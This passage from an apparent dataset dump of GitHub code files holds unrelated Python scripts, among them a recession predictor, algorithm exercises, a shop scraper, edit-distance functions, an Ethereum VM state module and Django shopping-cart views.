want to split your train and test\n time: list of horizons you're testing\n \n \"\"\"\n \n result = pd.DataFrame(y.iloc[split:end].values)\n result.index = y.iloc[split:end].index\n \n eval_metrics = pd.DataFrame(columns = ['Time_Horizon','AUC','Log_Loss'])\n\n for point in time:\n \n model = RandomForestClassifier(n_estimators=500, max_depth=4, random_state=45, max_features = 'sqrt')\n \n \n y_shift = y.shift(point) #needs to be negative to look forward\n y_shift = y_shift.fillna(0)\n \n X_train = X.iloc[start:split]\n X_test = X.iloc[split:end]\n y_train = y_shift.iloc[start:split]\n y_test = y_shift.iloc[split:end]\n \n\n model.fit(X_train, y_train)\n \n probs = model.predict_proba(X_test)\n \n evals = {'Time_Horizon': point,\n 'AUC': roc_auc_score(y_test.values, probs[:,1:]),\n 'Log_Loss': log_loss(y_test, probs)}\n \n eval_metrics = eval_metrics.append(evals, ignore_index = True)\n \n result[str(point)] = probs[:,1]\n \n result = result.drop(columns = 0)\n result.columns = ['Current Month','1 Month Horizon','3 Month Horizon','12 Month Horizon']\n \n return result, eval_metrics\n\ndef create_chart(probs_chart, column = 0):\n \n \"\"\"\n Takes in probability chart and the specific series you want to graph then graphs it with 2005+ recessions plotted\n \"\"\"\n \n x = probs_chart.index\n series = probs_chart.iloc[:,column]\n\n fig, ax = plt.subplots(figsize=(18, 6))\n\n ax.plot(x, series, linewidth=2.5, zorder=2)\n ax.scatter(x, series, s=0, zorder=1, label='_nolegend_')\n ax.axvspan(x[38],x[56], color=sns.xkcd_rgb['grey'], alpha=0.5)\n ax.axvspan(x[74],x[77], color=sns.xkcd_rgb['grey'], alpha=0.5)\n ax.axvspan(x[80],x[83], color=sns.xkcd_rgb['grey'], alpha=0.5)\n\n 
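# The three shaded spans above mark GDP-contraction windows at hard-coded row\n    # positions (38-56, 74-77, 80-83) of the test index, rather than date lookups.\n\n    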
ax.set_title('Recession Prediction With Contractions in Real GDP Shaded in Gray', fontsize=14, fontweight='demi')\n\n ax.legend(loc='upper left', fontsize=11, frameon=True).get_frame().set_edgecolor('blue')\n\n ax.set_ylabel('% Probability of Q/Q Decrease in Real GDP')\n ax.set_xlabel('Date')","repo_name":"sandroclark/recession_predictor","sub_path":"rand_frst/gen_results_rf.py","file_name":"gen_results_rf.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42324913485","text":"list=[0,1,3,6,8,14,35]\r\nfirst=0\r\nlast=len(list)-1\r\nsearch = 10\r\n\r\nwhile first<=last:\r\n mid=(first+last) // 2\r\n if search==list[mid]:\r\n print(\"exists at\",mid+1)\r\n break\r\n elif search>list[mid]:\r\n first=mid+1\r\n else:\r\n last=mid-1\r\n\r\n\r\nif first>last:\r\n print(\"not found\")","repo_name":"JyotsnaMeda/pythonassignmet1","sub_path":"ans2b.py","file_name":"ans2b.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20800967212","text":"for _ in range(int(input())):\n input()\n arr = [int(i) for i in input().split()]\n arr.insert(0, 10e10)\n arr.append(10e10)\n mx = max(arr)\n indices = [i for i, x in enumerate(arr) if x == mx]\n del indices[0]\n del indices[-1]\n f = False\n for i in indices:\n try:\n if arr[i+1] < arr[i] or arr[i-1] < arr[i]:\n f=True\n print(i)\n break\n except:\n continue\n if not f:\n print(-1)","repo_name":"michbogos/olymp","sub_path":"codeforces/SBM/29_10_22/Dominant_Pirhana.py","file_name":"Dominant_Pirhana.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19969964337","text":"import json\nimport os\nimport time\n\nimport fake_useragent\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\nfrom selenium.webdriver.common.by import By\n\nua = UserAgent()\nfake_ua = ua.random\n\nheaders = {\n 'user-agent': fake_ua\n}\n\n\ndef get_data_dns(search, user_id=None):\n items_result = []\n with webdriver.Chrome() as browser:\n for page in range(1, 6):\n url = f'https://www.dns-shop.ru/search/?q={search}&order=discount&stock=now&p={page}'\n browser.get(url=url)\n time.sleep(2)\n soup = BeautifulSoup(browser.page_source, 'lxml')\n items = soup.find_all(class_='catalog-product')\n for item in items:\n try:\n item_name = item.findNext('a', class_='catalog-product__name').text\n except AttributeError:\n item_name = None\n try:\n item_price = item.findNext('div', class_='product-buy__price').text\n except AttributeError:\n item_price = None\n try:\n item_url = 'https://www.dns-shop.ru' + item.findNext('a', class_='catalog-product__name')['href']\n except AttributeError:\n item_url = None\n try:\n item_rating = item.findNext('a', class_='catalog-product__rating')['data-rating']\n except AttributeError:\n item_rating = None\n try:\n item_rating_count = item.findNext('a', class_='catalog-product__rating').text\n except AttributeError:\n item_rating_count = None\n items_result.append({\n 'item_name': item_name,\n 'item_price': item_price,\n 'item_url': item_url,\n 'item_rating': item_rating,\n 'item_rating_count': item_rating_count\n })\n if not os.path.exists('data'):\n os.mkdir('data')\n with open(f'data/dns-{user_id}.json', 'w', encoding='utf-8') as file:\n json.dump(items_result, file, indent=4, 
ensure_ascii=False)\n\n\ndef main():\n    get_data_dns(input('Search: '))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Baradys/marketplace_bot","sub_path":"resources/dns/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8103529608","text":"#\n# @lc app=leetcode id=13 lang=python3\n#\n# [13] Roman to Integer\n#\n\n# @lc code=start\nclass Solution:\n    def romanToInt(self, s: str) -> int:\n        Roman = {'I': 1, 'V': 5,'X': 10,'L': 50,'C': 100,'D': 500,'M': 1000}\n        i = 0\n        sum = 0\n        while True:\n            if i == (len(s) - 1):\n                break\n            if Roman[s[i + 1]] > Roman[s[i]]:\n                sum -= Roman[s[i]]\n            else:\n                sum += Roman[s[i]]\n            i += 1 \n        sum += Roman[s[i]]\n        return sum\n\n'''\nclass Solution:\n    def romanToInt(self, s: str) -> int:\n        translations = {\n            \"I\": 1,\n            \"V\": 5,\n            \"X\": 10,\n            \"L\": 50,\n            \"C\": 100,\n            \"D\": 500,\n            \"M\": 1000\n        }\n        number = 0\n        s = s.replace(\"IV\", \"IIII\").replace(\"IX\", \"VIIII\")\n        s = s.replace(\"XL\", \"XXXX\").replace(\"XC\", \"LXXXX\")\n        s = s.replace(\"CD\", \"CCCC\").replace(\"CM\", \"DCCCC\")\n        for char in s:\n            number += translations[char]\n        return number\n'''\n# @lc code=end\n\n","repo_name":"HongyuZhu999/LeetCode","sub_path":"13.roman-to-integer.py","file_name":"13.roman-to-integer.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15697353945","text":"import webbrowser\nimport sys\nimport requests\nimport bs4\n\n\ndef main():\n    print(\"hello\")\n\n    search_url: str = \"https://pypi.org/search/?q=\"\n\n    if len(sys.argv) == 2:\n        package_name: str = sys.argv[1]\n\n        res = requests.get(search_url+package_name)\n        res.raise_for_status()\n\n        soup = bs4.BeautifulSoup(res.text, 'html.parser')\n        search_results = soup.select('.package-snippet')\n\n        tabs_to_open: int = min(5, len(search_results))\n\n        for i in range(tabs_to_open):\n            url_to_open = \"https://pypi.org/\" + search_results[i].get('href')\n            print(\"Opening: \" + url_to_open)\n\n            webbrowser.open(url_to_open)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Atropos148/AutomateTheBoringStuff2E","sub_path":"pypi_result_opener.py","file_name":"pypi_result_opener.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30600927725","text":"class Solution(object):\n    def mySqrt(self,x):\n        if(x==0):return 0\n        s=len(str(x))\n        l=s//2\n        d=s%2\n        if(d==0):\n            Max=10**(l)\n            Min=3*10**(l-1)\n        else:\n            Max=4*10**(l)\n            Min=10**(l)\n        print(Min,Max)\n        while (Min+1!=Max):\n            if(x==Max**2):return Max\n            k=(Min+Max)//2\n            # print(k)\n            if (x<k**2):\n                Max=k\n            elif (x>k**2):\n                Min=k\n            else:\n                return k\n            # print(Min,Max)\n        print(Min,Max)\n        return Min\n        \nA=Solution()\na=A.mySqrt(984230921)\nprint(a)","repo_name":"RaindropSaber/leetcode","sub_path":"69.py","file_name":"69.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37407574654","text":"import empyrical as em\nimport numpy as np\nimport pandas as pd\nfrom empyrical.stats import (\n    _aligned_series,\n    _create_unary_vectorized_roll_function,\n    rolling_window,\n)\n\n\ndef rfill(roll_res, window):\n    if isinstance(roll_res, pd.Series):\n        res = roll_res.values.tolist()\n    elif isinstance(roll_res, np.ndarray):\n        res = roll_res.tolist()\n    return np.array([np.nan] * (window - 1) + 
res)\n\n\ndef vol_diff(price_vol_data, lkb):\n # Compute sum of volume of past `lkb` to `lkb-1` days for days that are above current price,\n # and for days that are below current price.\n # Then, take the difference of the 2 sum - to measure how much volume is traded under/above the latest price.\n # price_vol_data = df[[\"Price\", \"Volume\"]].values\n # Formula: VD = SUM_{P0 > Pt} Vt - SUM_{P0 < Pt} Vt\n # Bullish if total volume below current price is greater than total volume above current price.\n z1 = rolling_window(price_vol_data, lkb) # [-1]\n above = z1[:, -1:, 0] > z1[:, :-1, 0]\n below = z1[:, -1:, 0] < z1[:, :-1, 0]\n vol_sum_above = (z1[:, :-1, 1] * above).sum(axis=1)\n vol_sum_below = (z1[:, :-1, 1] * below).sum(axis=1)\n vol_diff = vol_sum_above - vol_sum_below\n return rfill(vol_diff, lkb)\n\n\ndef term_zscore(x, short=20, long=252, stdev=252):\n return (x.rolling(short).mean() - x.rolling(long).mean()) / x.rolling(stdev).std()\n\n\ndef stochastic_oscillator(x, lkb):\n rw = x.rolling(lkb)\n return (x - rw.min()) / (rw.max() - rw.min())\n\n\ndef roll_zscore(x, mean_lkb, std_lkb):\n return (x - x.rolling(mean_lkb).mean()) / x.rolling(std_lkb).std()\n\n\ndef roll_alpha_beta(returns, benchs, window):\n x = em.roll_alpha_beta(returns, benchs, window)\n return x.iloc[:, 0], x.iloc[:, 1]\n\n\ndef roll_alpha_beta_down(returns, benchs, window):\n benchs_down = benchs[benchs < 0]\n x = em.roll_alpha_beta(returns, benchs_down, window)\n return x.iloc[:, 0], x.iloc[:, 1]\n\n\ndef roll_alpha_beta_up(returns, benchs, window):\n benchs_up = benchs[benchs > 0]\n x = em.roll_alpha_beta(returns, benchs_up, window)\n return x.iloc[:, 0], x.iloc[:, 1]\n\n\ndef roll_exponential_regression(returns, windows):\n x = returns.copy()\n if isinstance(returns, pd.Series):\n x = returns.values\n\n wins = rolling_window(x, windows) # construct rolling windows\n Y = np.log(1 + em.cum_returns(wins.T))\n x = np.arange(1, windows + 1, 1)\n X = np.c_[x, np.ones_like(x)]\n coeffs = np.polyfit(x, Y, 1) # [:,0]\n Yhat = X @ coeffs\n ybar = Yhat.mean(axis=0)\n ssreg = np.sum(np.power(Yhat - ybar, 2), axis=0)\n sstot = np.sum(np.power(Y - ybar, 2), axis=0)\n determination = ssreg / sstot\n slope = coeffs[0, :]\n intercept = coeffs[1, :]\n\n if isinstance(returns, pd.Series):\n slope = pd.Series(slope, returns.index[(windows - 1) :])\n intercept = pd.Series(intercept, returns.index[(windows - 1) :])\n determination = pd.Series(determination, returns.index[(windows - 1) :])\n return determination, slope, intercept\n\n\ndef roll_standard_regression(price_x, price_y, windows):\n if isinstance(price_x, pd.Series) and isinstance(price_y, pd.Series):\n gen = _aligned_series(price_x, price_y)\n x, y = [j for j in gen]\n idx = x.index\n x, y = x.values, y.values\n else:\n assert len(price_x) == len(price_y)\n x, y = price_x, price_y\n wins_x = rolling_window(x, windows) # construct rolling windows\n wins_y = rolling_window(y, windows) # construct rolling windows\n coeffs = [np.polyfit(x1, y1, 1) for x1, y1 in zip(wins_x, wins_y)]\n slope = [j[0] for j in coeffs]\n intercept = [j[1] for j in coeffs]\n\n coeffs = np.array(coeffs)\n slopes, intercepts = coeffs[:, 0], coeffs[:, 1]\n\n yhat = slopes[:, np.newaxis] * wins_x\n ybar = yhat.mean(axis=1)\n ssreg = np.sum(np.power(yhat - ybar[:, np.newaxis], 2), axis=1)\n sstot = np.sum(np.power(wins_y - ybar[:, np.newaxis], 2), axis=1)\n determination = ssreg / sstot\n\n slopes = rfill(slopes, windows)\n intercepts = rfill(intercepts, windows)\n determination = rfill(determination, 
windows)\n\n    if isinstance(price_x, pd.Series) and isinstance(price_y, pd.Series):\n        slopes = pd.Series(slopes, index=idx)\n        intercepts = pd.Series(intercepts, index=idx)\n        determination = pd.Series(determination, index=idx)\n        yhat = pd.Series(yhat, index=idx)\n\n    return determination, slopes, intercepts\n\n\ndef cagr_em(returns, annualized_factor=252, days=None, out=None):\n    \"\"\"faster implementation for roll_cagr_em only\n    use metrics_functions.cagr for non-rolling computation\n    parameters:\n    days - not used!\n    \"\"\"\n\n    allocated_output = out is None\n    if allocated_output:\n        out = np.empty(returns.shape[1:])\n\n    return_1d = returns.ndim == 1\n\n    if len(returns) < 2:\n        out[()] = np.nan\n        if return_1d:\n            out = out.item()\n        return out\n\n    ann_factor = annualized_factor\n    out = em.cagr(returns, annualization=ann_factor)\n    if return_1d:\n        out = out.item()\n    return out\n\n\ndef roll_drawdown(x, window, min_periods=1):\n    y = (x + 1).cumprod()\n    return y / y.rolling(window, min_periods=min_periods).max() - 1\n\n\nroll_cagr = _create_unary_vectorized_roll_function(cagr_em)\nroll_max_drawdown = em.roll_max_drawdown\n","repo_name":"etq-quant/etqbankloan","sub_path":"src/roll.py","file_name":"roll.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27480592221","text":"import cv2\nfrom pyardrone import ARDrone\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclient = ARDrone()\nclient.video_ready.wait()\ntry:\n    while True:\n        cv2.imshow('im', client.frame)\n        if cv2.waitKey(10) == ord(' '):\n            break\nfinally:\n    client.close()\n","repo_name":"afq984/pyardrone","sub_path":"examples/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"6"} +{"seq_id":"7176969869","text":"from typing import (\n    Type,\n)\n\nfrom eth_utils import (\n    encode_hex,\n)\n\nfrom eth.abc import (\n    ComputationAPI,\n    SignedTransactionAPI,\n    TransactionExecutorAPI,\n)\nfrom eth.vm.forks.homestead.state import (\n    HomesteadState,\n    HomesteadTransactionExecutor,\n)\n\nfrom ._utils import (\n    collect_touched_accounts,\n)\nfrom .computation import (\n    SpuriousDragonComputation,\n)\n\n\nclass SpuriousDragonTransactionExecutor(HomesteadTransactionExecutor):\n    def finalize_computation(\n        self, transaction: SignedTransactionAPI, computation: ComputationAPI\n    ) -> ComputationAPI:\n        computation = super().finalize_computation(transaction, computation)\n\n        #\n        # EIP161 state clearing\n        #\n        touched_accounts = collect_touched_accounts(computation)\n\n        for account in touched_accounts:\n            should_delete = self.vm_state.account_exists(\n                account\n            ) and self.vm_state.account_is_empty(account)\n            if should_delete:\n                self.vm_state.logger.debug2(\n                    \"CLEARING EMPTY ACCOUNT: %s\",\n                    encode_hex(account),\n                )\n                self.vm_state.delete_account(account)\n\n        return computation\n\n\nclass SpuriousDragonState(HomesteadState):\n    computation_class: Type[ComputationAPI] = SpuriousDragonComputation\n    transaction_executor_class: Type[\n        TransactionExecutorAPI\n    ] = SpuriousDragonTransactionExecutor\n","repo_name":"ethereum/py-evm","sub_path":"eth/vm/forks/spurious_dragon/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":2109,"dataset":"github-code","pt":"6"} +{"seq_id":"30441967555","text":"# there are many calendars and, accordingly, many systems 
for counting leap days\r\n# the Julian, Gregorian and Hebrew ones are implemented here\r\n# I wanted to add the Islamic one too, but its counting algorithms are so unhinged (and, strictly speaking,\r\n# it has leap months rather than leap years) that it is easier to just hardcode it as a table\r\n\r\n\r\ndef JulLeapYear(year): # Julian\r\n    if year % 4 == 0:\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef GregLeapYear(year): # Gregorian\r\n    if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef HebrLeapYear(year): # Hebrew\r\n    if ((((year*7)+1) % 19) < 7):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n# now let's do the checking\r\nprint('Enter a year')\r\nyear = int(input()) # ideally we should check that the user actually entered a year, but I am lazy\r\nprint('Enter a digit for the calendar you want to use to determine whether the year is a leap year: 1 - Julian, 2 - Gregorian, 3 - Hebrew')\r\nCal_type = int(input())\r\nCal_var = [1,2,3] # but we do check that the calendar type was entered correctly\r\nif Cal_type in Cal_var:\r\n    if Cal_type == 1:\r\n        print(JulLeapYear(year))\r\n    elif Cal_type == 2:\r\n        print(GregLeapYear(year))\r\n    elif Cal_type == 3:\r\n        print(HebrLeapYear(year))\r\nelse: \r\n    print('You entered an invalid calendar type, try restarting the script')\r\n","repo_name":"SperryUNIVAC/PYDA14","sub_path":"Lecture_02/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3375152589","text":"# -*- coding: utf-8 -*-\n# @Time: 2022/2/8 13:58\n# @Author: Anshang\n# @File: img_process.py\n# @Software: PyCharm\nimport _thread\n\nimport requests\nimport re\n\nUA = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.76\"\nheaders = {\n    \"User-Agent\": UA,\n}\n\n\ndef download(url, book_name, changed_url, img_counter):\n    img_file = requests.get(url, headers=headers).content\n    with open(book_name + \"/OEBPS\" + changed_url, \"wb\") as f:\n        f.write(img_file)\n        f.close()\n    # print(book_name, \"pic\", img_counter[1], \"download finish\")\n    img_counter[1] = img_counter[1] + 1\n\n\nimg_re = re.compile(r\"<img.*?>\")\nurl_re = re.compile(r'src=\"(?P<url>.*?)\"')\n\n\ndef img_process(src, img_counter,book_name=None):\n    imgs = img_re.finditer(src)\n    for img in imgs:\n        url = url_re.search(img.group()).group(\"url\")\n        file_name = url.split('/')[-1]\n        changed_url = \"/Images/\" + file_name\n        src = src.replace(url, \"..\"+changed_url)\n        img_counter[0] = img_counter[0] + 1\n        if url.startswith(\"/\"):\n            url = \"https://www.lightnovel.app\" + url\n        _thread.start_new_thread(download, (url, book_name, changed_url, img_counter))\n    return src\n\n","repo_name":"anshangPro/SpiderForLightNovelShift","sub_path":"img_process.py","file_name":"img_process.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"41245144750","text":"import pandas as pd\n\n#STEP1: GET AND IMPORT THE DATA SET\ntabela = pd.read_csv(r'C:\\\\Users\\\\andre\\\\OneDrive\\\\Documentos\\\\GitHub\\\\Python\\\\Intensivão de Python\\\\Aula 2 - análise de dados\\\\clientes.csv', encoding='latin', sep=';')\n\n\n\n#STEP2: INSPECT THE DATA SET\n\n#Understand the information you have available\n#understand the characteristics of the customers\n#Look for the \"messes\" in the data set\n#identified the empty \"Unnamed: 8\" column, which was 
deleted\n#delete useless columns\ntabela = tabela.drop('Unnamed: 8', axis = 1)\n#axis = 0 --> delete a row   axis = 1 --> delete a column\n\n#STEP3: DATA CLEANING\n#values in the wrong format\n#converts the \"Salário Anual (R$)\" column to numeric; the 'coerce' parameter forces the conversion, leaving the value empty if there is an error\ntabela['Salário Anual (R$)'] = pd.to_numeric(tabela['Salário Anual (R$)'], errors='coerce') \n#empty values\ntabela = tabela.dropna() # drops all rows that are empty\n#print(tabela.info())\n\n#STEP4: INITIAL ANALYSIS\nprint(tabela) ","repo_name":"andrematos90/Python","sub_path":"HashTagTreinamentos/Aula 2 - análise de dados/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34268253148","text":"\"\"\"\nPure, single-file implementations of various edit distances, including\nHamming, Levenshtein, Levenshtein (normalized), Levenshtein (recursive),\nand Damerau-Levenshtein distances.\n\"\"\"\n__author__ = \"Carlton Shepherd\"\n\n\ndef _wagner_fischer(a: str, b: str, method: str) -> int:\n    \"\"\"\n    Implements the Wagner-Fischer dynamic programming algorithm [1,2].\n\n    Counts insertions, deletions, transpositions and substitutions\n    depending on the method.\n\n    1. R. Wagner and M. Fischer, \"The string to string correction problem,\" \n    Journal of the ACM, 21:168-178, 1974.\n    2. https://en.wikipedia.org/wiki/Wagner%E2%80%93Fischer_algorithm\n\n    Parameters:\n        a: First string\n        b: Second string\n        method: Distance method (\"lev\", \"dl\"), i.e. Levenshtein or\n            Damerau-Levenshtein respectively.\n    Returns:\n        Wagner-Fischer cost (integer).\n    \"\"\"\n    a_len, b_len = len(a), len(b)\n\n    if a_len == 0:\n        return b_len\n    elif b_len == 0:\n        return a_len\n\n    _a, _b = \" \" + a, \" \" + b\n    a_len, b_len = len(_a), len(_b)\n    dist_matrix = [[0] * a_len for _ in range(b_len)]\n\n    for i in range(a_len):\n        dist_matrix[0][i] = i\n\n    for j in range(b_len):\n        dist_matrix[j][0] = j\n\n    for j in range(1, b_len):\n        for i in range(1, a_len):\n            if _a[i] == _b[j]:\n                dist_matrix[j][i] = dist_matrix[j-1][i-1]\n            else:\n                dist_matrix[j][i]= min(dist_matrix[j][i-1], \n                                       dist_matrix[j-1][i],\n                                       dist_matrix[j-1][i-1]) + 1\n            if method == \"dl\":\n                if i and j and _a[i] == _b[j-1] and _a[i-1] == _b[j]:\n                    dist_matrix[j][i] = min(\n                        dist_matrix[j][i],\n                        dist_matrix[j-2][i-2]+1)\n    return dist_matrix[-1][-1]\n    \n\ndef _lcs_dp(a: str, b: str) -> int:\n    \"\"\"\n    A somewhat simpler dynamic programming algorithm for LCS.\n\n    Parameters:\n        a: First string\n        b: Second string\n    Returns:\n        LCS length (integer)\n    \"\"\"\n    if len(a) == 0 or len(b) == 0:\n        return 0\n\n    a_len, b_len = len(a)+1, len(b)+1\n    dist_matrix = [[0] * (a_len) for _ in range(b_len)]\n\n    for j in range(b_len):\n        for i in range(a_len):\n            if i == 0 or j == 0:\n                dist_matrix[j][i] = 0\n            elif a[i-1] == b[j-1]:\n                dist_matrix[j][i] = dist_matrix[j-1][i-1]+1\n            else:\n                dist_matrix[j][i] = max(dist_matrix[j-1][i],\n                                        dist_matrix[j][i-1])\n    return dist_matrix[-1][-1]\n    \n\ndef levenshtein(a: str, b: str) -> int:\n    \"\"\"\n    Computes the Levenshtein distance: the number of\n    insertions, deletions or substitutions required\n    to transform a -> b.\n\n    Uses the Wagner-Fischer dynamic programming algorithm.\n    \n    Parameters:\n        a: First string\n        b: Second string\n    Returns:\n        Levenshtein distance (integer)\n    \"\"\"\n    return _wagner_fischer(a, b, \"lev\")\n\n\ndef levenshtein_recursive(a: str, b: str) -> int:\n    
\"\"\"\n Computes the Levenshtein distance using the naive\n recursive implementation.\n\n See: https://en.wikipedia.org/wiki/Levenshtein_distance\n\n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Levenshtein distance (integer)\n \"\"\"\n if len(a) == 0:\n return len(b)\n elif len(b) == 0:\n return len(a)\n elif a[0] == b[0]:\n return levenshtein_recursive(a[1:], b[1:])\n else:\n return 1 + min(levenshtein_recursive(a[1:], b),\n levenshtein_recursive(a, b[1:]),\n levenshtein_recursive(a[1:], b[1:]))\n\n\ndef normalized_levenshtein(a: str, b: str) -> float:\n \"\"\"\n Implements the normalized Levenshtein metric by Yujian & Bo [1].\n\n 1. L. Yujian and L. Bo, \"A normalized Levenshtein distance metric,\" \n IEEE Transactions on Pattern Analysis and Machine Intelligence (2007).\n https://ieeexplore.ieee.org/document/4160958\n\n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Normalized Levenshtein distance (float)\n \"\"\"\n a_len, b_len = len(a), len(b)\n d = levenshtein(a, b)\n dem = ((a_len+b_len) + d)\n try:\n return (2 * d) / ((a_len+b_len) + d)\n except ZeroDivisionError:\n return 0.0\n\n\ndef damerau_levenshtein(a: str, b: str) -> int:\n \"\"\"\n Computes the Damerau-Levenshtein distance: the number of\n insertions, deletions, substitutions, and transpositions needed\n to transform a -> b.\n\n Uses the Wagner-Fischer algorithm.\n\n Parameters:\n a: First string\n b: Second string\n Returns:\n Damerau-Levenshtein distance (integer)\n \"\"\"\n return _wagner_fischer(a, b, \"dl\")\n\n\ndef hamming(a: str, b: str) -> int:\n \"\"\"\n Finds the Hamming distance, the number of substitutions\n (only) to transform a -> b.\n\n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Hamming distance (integer)\n \"\"\"\n if len(a) != len(b):\n raise ValueError(\"Inputs must be of equal length!\")\n return sum([1 for i, j in zip(a, b) if i != j ])\n\n\ndef longest_common_subsequence(a: str, b: str) -> int:\n \"\"\"\n Finds the longest common subsequence (LCS) of two strings.\n \n Parameters:\n a: First string\n b: Second string\n\n Returns:\n Longest common subsequence (integer)\n \"\"\"\n return _lcs_dp(a, b)\n\n\ndef distance(a: str, b: str, method: str):\n \"\"\"\n Wrapper function for calculating the distance of two strings\n using a given method.\n\n Parameters:\n a: First string\n b: Second string\n c: Distance metric, one of: ['levenshtein',\n 'normalized_levenshtein', 'levenshtein_recurisve',\n 'damerau-levenshtein', 'hamming']\n\n Returns:\n Distance of a and b using the given method\n \"\"\"\n if method == \"levenshtein\":\n return levenshtein(a, b)\n elif method == \"levenshtein_recursive\":\n return levenshtein_recursive(a, b)\n elif method == \"normalized_levenshtein\":\n return normalized_levenshtein(a, b)\n elif method == \"damerau_levenshtein\":\n return damerau_levenshtein(a, b)\n elif method == \"hamming\":\n return hamming(a, b)\n elif method == \"lcs\":\n return longest_common_subsequence(a, b)\n else:\n raise ValueError(\"Invalid method! 
Must be one of: \" \\\n \"['levenshtein', 'normalized_levenshtein', \" \\\n \"'levenshtein_recursive', 'damerau-levenshtein', \" \\\n \"'lcs', 'hamming']\")\n","repo_name":"cgshep/pyeditdistance","sub_path":"src/pyeditdistance/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73918948026","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django import template\nfrom .forms import SignupForm, AddItemToCart, DeliverInfo, CartForm, SearchItem\nfrom .models import Cart, Order, PurchasedProduct, Warehouse\nfrom django.contrib import messages\nfrom django.views.generic import CreateView, ListView, UpdateView, DeleteView, DetailView, FormView\nfrom django.template.defaulttags import register\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nimport socket\n\n# Create your views here.\n\nback_end_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntry: \n back_end_socket.connect((\"vcm-12231.vm.duke.edu\", 65432))\nexcept BaseException as e:\n print(\"Migrating...\")\n\ndef receive_backend_response():\n front_end_request = \"\"\n bit = back_end_socket.recv(1)\n bit = bit.decode()\n while bit != \"\\n\":\n front_end_request += bit\n bit = back_end_socket.recv(1)\n bit = bit.decode()\n return front_end_request\n\nclass CartDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Cart\n template_name = 'item_delete.html'\n success_url = '/amazon/myCart' \n \n def delete(self, request, *args, **kwargs):\n return super(CartDeleteView, self).delete(request, *args, **kwargs)\n\n def test_func(self):\n cart = self.get_object()\n if self.request.user == cart.userid:\n return True\n return False\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n form.save()\n # messages.success(request, 'Account created successfully')\n return redirect('login')\n else:\n form = SignupForm()\n return render(request, 'signup.html', context={'form': form})\n\n@login_required(login_url='../accounts/login/')\ndef search_item(request):\n if request.method == 'POST':\n form = SearchItem(request.POST)\n if form.is_valid():\n url = form.cleaned_data['item_name'] + \"/Add\"\n return redirect(url)\n else:\n form = SearchItem()\n\n return render(request, 'search_item.html', context={'form': form})\n\n@login_required(login_url='../accounts/login/')\ndef add_to_cart(request, product_name):\n if request.method == 'POST':\n form = AddItemToCart(request.POST)\n if form.is_valid():\n current_cart = Cart\n if current_cart.objects.filter(product_name = product_name, userid = request.user).exists():\n current_product = get_object_or_404(Cart, pk=product_name)\n current_product.count += form.cleaned_data['quantity']\n current_product.save()\n else:\n cart = Cart()\n cart.userid = request.user\n cart.product_name = product_name\n cart.count = form.cleaned_data['quantity']\n cart.save()\n messages.success(request, 'item added!')\n back_end_request = \"purchase more:\" + product_name + \"-\" + str(form.cleaned_data['quantity']) + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n return redirect('/')\n else:\n form = AddItemToCart()\n return render(request, 'add_item.html', context={'form': form, 'product_name':product_name})\n\nclass check_my_cart(LoginRequiredMixin, ListView):\n model = Cart\n 
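# ListView restricted to the signed-in user's own cart rows.\n    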
